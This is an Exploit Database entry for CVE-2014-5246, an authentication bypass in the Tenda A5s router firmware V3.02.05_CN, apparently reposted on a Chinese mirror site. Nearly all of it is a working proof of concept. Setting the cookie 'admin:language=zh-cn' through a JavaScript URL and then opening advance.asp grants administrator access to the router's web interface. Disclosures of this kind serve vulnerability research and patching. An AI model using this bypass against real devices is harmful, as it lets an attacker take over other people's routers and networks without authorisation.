Tenda A5s Router 3.02.05_CN – Authentication Bypass

• Exploit Database
• 11 阅读

• 作者： zixian
  日期： 2014-08-18
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/34361/

• -----------------------------------------------------------------------
  Tenda A5s Router Authentication Bypass Vulnerability
  -----------------------------------------------------------------------
  Author: zixian
  Mail: me@zixian.org
  Date: Aug, 17-2014
   
  Vendor: http://tenda.com.cn/
  Link: http://tenda.com.cn/Catalog/Product/223
  Version : V3.02.05_CN
  CVE : CVE-2014-5246
   
  Exploit & p0c
  _____________
   
  go to
  http://192.168.2.1/
   
  then set cookie with javascript
   
  javascript:document.cookie='admin:language=zh-cn'
  
  go to
  http://192.168.2.1/advance.asp
  
  you are the admin!
  _____________